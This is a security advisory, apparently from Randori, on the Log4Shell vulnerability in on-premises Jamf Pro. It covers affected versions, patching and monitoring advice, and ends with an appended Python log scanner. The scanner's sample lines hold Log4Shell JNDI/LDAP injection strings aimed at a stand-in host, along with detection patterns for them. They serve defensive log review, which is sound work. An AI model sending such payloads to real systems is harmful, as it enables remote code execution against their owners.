Update Regarding Exploitability of JAMF Pro:
Last Update: 3:22pm EST, Dec. 11, 2021
Following the acknowledgement of products affected by Log4j, Randori can confirm the exploitability of Jamf Pro (security notice) via the Log4j vulnerability CVE-2021-44228, also known as “Log4Shell.” Recent unpatched versions of Jamf Pro, including those running on Java 11, are not protected against this exploitation and should not be considered protected. Due to the severity of impact from the exploit (RCE) and the widespread use of this Java library, Randori recommends this vulnerability be addressed immediately.
Randori’s Attack Team has validated exploitability with working exploits that achieve code execution via unauthenticated network vectors specifically on Jamf Pro, and anticipates widespread exploitation by threat actors imminently. Randori does not release proof-of-concept code. These exploits cover Jamf Pro 10.34.0 running on Java 11.
Based on our experience exploiting this vulnerability, we suggest organizations running Jamf Pro on-premises take the following steps to reduce their risks at this time:
- Review guidance provided by JAMF. Specifically, upgrade to 10.34.1 or later.
Randori’s Attack Team has confirmed that current exploitation techniques do not affect Jamf version 10.34.1.
Randori has observed cloud-hosted Jamf Pro instances reporting version numbers consistent with exploitability, but Jamf has reported that cloud-hosted instances are mitigated. Randori’s Attack Team has not independently verified the efficacy or extent of mitigations, and recommends treating any Jamf Pro instance prior to 10.34.1 as exploitable.
Situation Report: Jamf Impact from Log4Shell
A high severity vulnerability (CVE-2021-44228) impacting multiple versions of the Apache Log4j 2 library was disclosed publicly via the project’s GitHub on December 9, 2021. This vulnerability impacts multiple Jamf products. The Randori Attack Team can confirm exploitability of Jamf products in live environments via Log4j (CVE-2021-44228), aka “Log4Shell”.
This is a critical vulnerability and impacted organizations should take immediate action. This post will be regularly updated, but follow @RandoriAttack for immediate updates.
Impact
The Log4j 2 library is very frequently used in enterprise Java software. As with other high-profile vulnerabilities such as Heartbleed and Shellshock, we believe there will be an increasing number of vulnerable products discovered in the weeks to come. Randori has validated exploitability with a working exploit, and anticipates widespread exploitation by threat actors imminently. Randori has been in contact with the Jamf team to assist their development of mitigations.
Impacted products:
- Jamf Pro (on-prem)
  - Versions up to and including 10.34.0 are remotely exploitable, including those running on Java 11.
- Jamf Pro (cloud)
  - Jamf asserts these instances have been mitigated. This claim has not been validated by Randori.
Remediations & Recommendations
If running a vulnerable version of Jamf Pro, Randori recommends organizations take immediate action and do the following:
- Implement default-deny for outbound network connections initiated by the Jamf server.
- Patch.
- Assume compromise and review logs for signs of malicious activity.
- Monitor our Log4Shell Attacker Note for impact of Log4Shell beyond Jamf.
- Follow @RandoriAttack for updates.
If anomalies are found, we encourage you to assume this is an active incident and that you have been compromised, and to respond accordingly.
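One way to start the log review recommended above, as an added example that is not Randori's or Jamf's code: it flags log lines containing the publicly documented Log4Shell lookup string `${jndi:`, including percent-encoded forms, and marks nested `${...${` lookups for manual review. The sample lines and the generic access-log layout are constructed for illustration, and the log files to scan are passed as arguments because the page names no log paths.

```python
import re
import sys
from urllib.parse import unquote

# Direct JNDI lookup, matched case-insensitively once encoding is undone.
JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
# A lookup opened inside another lookup can hide the keyword from a plain
# string match, so it is flagged for manual review rather than ignored.
NESTED = re.compile(r"\$\{[^}]*\$\{")

def decode(line, rounds=3):
    """Undo up to `rounds` layers of percent-encoding."""
    for _ in range(rounds):
        decoded = unquote(line)
        if decoded == line:
            break
        line = decoded
    return line

def classify(line):
    """Return 'jndi-lookup', 'nested-lookup', or None for a clean line."""
    text = decode(line)
    if JNDI.search(text):
        return "jndi-lookup"
    if NESTED.search(text):
        return "nested-lookup"
    return None

def scan(lines):
    """Return (line_number, verdict, line) for every flagged line."""
    hits = []
    for number, line in enumerate(lines, 1):
        verdict = classify(line)
        if verdict:
            hits.append((number, verdict, line.rstrip("\n")))
    return hits

# Constructed sample lines in a generic access-log layout (assumption).
SAMPLE = [
    '203.0.113.7 - - [11/Dec/2021:15:02:11 +0000] "GET /index.html HTTP/1.1" 200 512 "Mozilla/5.0"',
    '203.0.113.9 - - [11/Dec/2021:15:03:40 +0000] "GET / HTTP/1.1" 200 512 "${jndi:ldap://example.invalid/a}"',
    '203.0.113.9 - - [11/Dec/2021:15:03:41 +0000] "GET /?q=%24%7BJNDI%3Aldap%3A%2F%2Fexample.invalid%2Fa%7D HTTP/1.1" 404 0 "curl"',
    '203.0.113.9 - - [11/Dec/2021:15:03:42 +0000] "GET / HTTP/1.1" 200 512 "${x${y}}"',
]

if __name__ == "__main__":
    # Pass log file paths as arguments; with none, the constructed sample is scanned.
    for path in sys.argv[1:]:
        with open(path, errors="replace") as fh:
            for number, verdict, line in scan(fh):
                print(path, number, verdict, line, sep="\t")
    if len(sys.argv) == 1:
        for hit in scan(SAMPLE):
            print(*hit, sep="\t")
```

A hit shows that a lookup string reached a log, not that it was evaluated, and a scan with no hits does not rule out compromise.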